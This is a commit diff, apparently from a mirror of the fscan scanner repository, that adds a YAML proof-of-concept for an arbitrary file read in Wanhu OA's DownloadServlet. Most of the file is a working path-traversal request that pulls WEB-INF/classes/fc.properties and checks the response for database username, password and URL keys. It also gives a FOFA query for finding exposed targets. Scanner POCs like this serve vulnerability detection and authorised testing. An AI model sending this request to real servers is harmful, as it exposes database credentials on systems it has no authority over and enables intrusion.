mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
feat: add curated internal network pocs
This commit is contained in:
@@ -0,0 +1,19 @@
|
||||
id: wanhu-oa-downloadservlet-fileread
|
||||
|
||||
info:
|
||||
name: 万户OA DownloadServlet 任意文件读取漏洞
|
||||
author: zan8in
|
||||
severity: high
|
||||
description: |
|
||||
万户OA DownloadServlet接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的敏感文件,获取敏感信息
|
||||
fofa: app="万户网络-ezOFFICE"
|
||||
tags: wanhu,download,servlet,fileread
|
||||
created: 2025/03/13
|
||||
|
||||
rules:
|
||||
r0:
|
||||
request:
|
||||
method: GET
|
||||
path: /defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2
|
||||
expression: response.status == 200 && response.body.bcontains(b'ccerp.user')&& response.body.bcontains(b'ccerp.password') && response.body.bcontains(b'ccerp.url')
|
||||
expression: r0()
|
||||
Reference in New Issue
Block a user